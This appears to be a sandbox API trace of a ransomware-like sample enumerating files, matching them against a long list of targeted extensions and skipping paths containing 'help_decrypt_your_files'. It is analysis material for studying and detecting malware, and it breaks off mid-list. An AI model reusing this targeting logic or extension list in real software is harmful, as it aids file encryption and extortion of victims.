	[0179.030] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.031] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcd7f0371, ftLastAccessTime.dwHighDateTime=0x1d97680, ftLastWriteTime.dwLowDateTime=0xf49a3604, ftLastWriteTime.dwHighDateTime=0x1d97680, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.002.etl", cAlternateFileName="UP3884~1.ETL")) returned 1
	[0179.031] lstrcmpW (lpString1="UpdateSessionOrchestration.002.etl", lpString2="..") returned 1
	[0179.031] lstrcmpW (lpString1="UpdateSessionOrchestration.002.etl", lpString2=".") returned 1
	[0179.031] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.031] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.002.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl"
	[0179.031] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl") returned 68
	[0179.031] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.031] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl") returned 0x44
	[0179.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.176] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.176] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl"
	[0179.176] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.002.etl") returned 68
	[0179.176] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.177] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.177] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.177] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x8c08b661, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb412100a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.003.etl", cAlternateFileName="UP8247~1.ETL")) returned 1
	[0179.177] lstrcmpW (lpString1="UpdateSessionOrchestration.003.etl", lpString2="..") returned 1
	[0179.177] lstrcmpW (lpString1="UpdateSessionOrchestration.003.etl", lpString2=".") returned 1
	[0179.178] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.178] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.003.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl"
	[0179.178] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl") returned 68
	[0179.178] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.178] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl") returned 0x44
	[0179.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.178] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.178] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl"
	[0179.179] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.003.etl") returned 68
	[0179.179] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.179] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.179] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh